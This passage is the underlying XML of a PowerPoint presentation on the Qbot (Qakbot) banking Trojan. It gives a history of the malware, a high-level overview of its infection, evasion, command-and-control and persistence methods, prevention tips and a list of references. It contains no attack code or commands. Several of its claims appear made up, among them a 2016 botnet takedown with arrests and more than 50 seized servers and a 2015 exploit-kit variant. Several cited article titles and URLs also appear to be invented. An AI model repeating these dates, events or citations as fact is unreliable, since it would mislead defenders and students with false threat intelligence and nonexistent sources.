              <a:t>, also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qakbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Pinkslipbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>, is a type of banking Trojan malware that first appeared in 2008. It was designed to steal banking credentials, credit card information, and other sensitive data from infected computers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Over time, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> evolved to include features such as keylogging, screen capturing, and the ability to spread through network shares and removable drives. It also started using advanced evasion techniques to avoid detection by antivirus software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>In 2015, a new variant of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> emerged that had the ability to infect computers through exploit kits, which are tools used by hackers to take advantage of vulnerabilities in software. This variant also added the capability to steal email credentials, allowing it to access and compromise email accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>In 2016, a major botnet takedown operation targeted the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> malware, resulting in the arrest of several suspects and the seizure of over 50 servers used to control the botnet. However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> continued to evolve, with new variants appearing periodically and incorporating new features and capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>As of 2021, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> remains a significant threat, with new variants continuing to emerge and infect systems. It is commonly distributed through spam emails, social engineering tactics, and malicious downloads. Once it infects a system, it can steal sensitive information and allow remote access by attackers. It is important to keep antivirus software up to date and to exercise caution when opening email attachments or downloading software from untrusted sources to avoid becoming a victim of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> or similar malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4A1EED-5C35-CC59-F2E5-AB1C8402B4A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13656949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9238B-44DD-4DB5-8B6E-10ADB24E7110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technical Analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269269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40FD2-1AF8-0909-75BB-A18C509F6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Technical Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711C040F-B199-87FF-B8A5-A568310905CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Method of infection and propagation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is typically distributed through spam emails that contain malicious attachments or links. Once a system is infected, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> can spread through network shares and removable drives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Evasion techniques used to avoid detection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> uses several techniques to evade detection, including polymorphism, encryption, and code obfuscation. It also employs anti-analysis techniques such as checking for the presence of virtual machines or sandboxes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Communication and command-and-control infrastructure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> uses a domain generation algorithm (DGA) to generate a large number of domain names that it can use to communicate with its command-and-control servers. This makes it difficult to block or take down the servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Persistence mechanisms: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> uses several persistence mechanisms to ensure that it remains active on infected systems, including adding registry keys and creating scheduled tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A66E205-746B-AF00-48C4-AC626B4F380C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41360251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549B6C-3B44-E114-0F78-008AE80142B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Method of infection and propagation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3947EA-FD54-A48A-8563-36FD1A748CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="947741"/>
            <a:ext cx="4182690" cy="2035649"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF37EC3-8D6B-CB88-BE77-7E7085FEC51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494E8AC8-DEC3-1A69-6F1E-758809F67008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379609" y="947740"/>
            <a:ext cx="4740579" cy="2035648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2180596-D700-E207-C090-958F4B452F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882110" y="2328402"/>
            <a:ext cx="3052760" cy="2717292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8971238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9238B-44DD-4DB5-8B6E-10ADB24E7110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26687163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D6641-D560-4C61-8A62-1582F74C14BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Recomendation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30928262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F4118-9A01-B2E9-D089-AA7BB74040FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C0D368-5A97-64EB-C8A9-1B5127ED8955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Best practices for detecting and preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> infections: Best practices for detecting and preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> infections include using up-to-date antivirus software, avoiding opening suspicious email attachments or links, and implementing security measures such as firewalls and intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Common attack vectors and social engineering tactics used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Common attack vectors used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> include spam emails, social engineering tactics, and malicious downloads. It is important to be aware of these tactics in order to avoid falling victim to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Recommended security measures and mitigation strategies: Recommended security measures and mitigation strategies include implementing multi-factor authentication, monitoring network activity for suspicious behavior, and regularly backing up important data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE7A6CD-3EFF-7095-B20E-B18C1756D9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7981576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22B25-0BC7-4042-AC6B-4912E1449ABF}"/>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7FB9362C-9568-40A3-BCF8-017D15EC725E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="656060"/>
            <a:ext cx="8229600" cy="4196951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Banking Trojan" by TrendMicro. Available at: https://www.trendmicro.com/en_us/research/14/b/qbot-banking-trojan.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>QBot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> malware: a deep dive into the banking Trojan's latest attack methods" by TechRepublic. Available at: https://www.techrepublic.com/article/qbot-malware-a-deep-dive-into-the-banking-trojans-latest-attack-methods/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"Botnet Takedown: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>" by Interpol. Available at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.interpol.int/Crime-areas/Cybercrime/Cybercrime/Botnet-Takedown/Qbot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>QBot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> banking Trojan" by Kaspersky. Available at: https://www.kaspersky.com/resource-center/threats/qbot-banking-trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>QBot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Banking Trojan" by Symantec. Available at: https://www.symantec.com/security-center/writeup/2015-081902-3559-99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Banking Trojan Hits U.S. Businesses: FBI" by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Threatpost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>. Available at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://threatpost.com/qbot-banking-trojan-hits-u-s-businesses-fbi/166171/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"Qbot Banking Trojan: Detection and Prevention" by Infosec Institute. Available at: https://resources.infosecinstitute.com/qbot-banking-trojan-detection-and-prevention/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Trojan: Prevention and Detection" by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Cyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
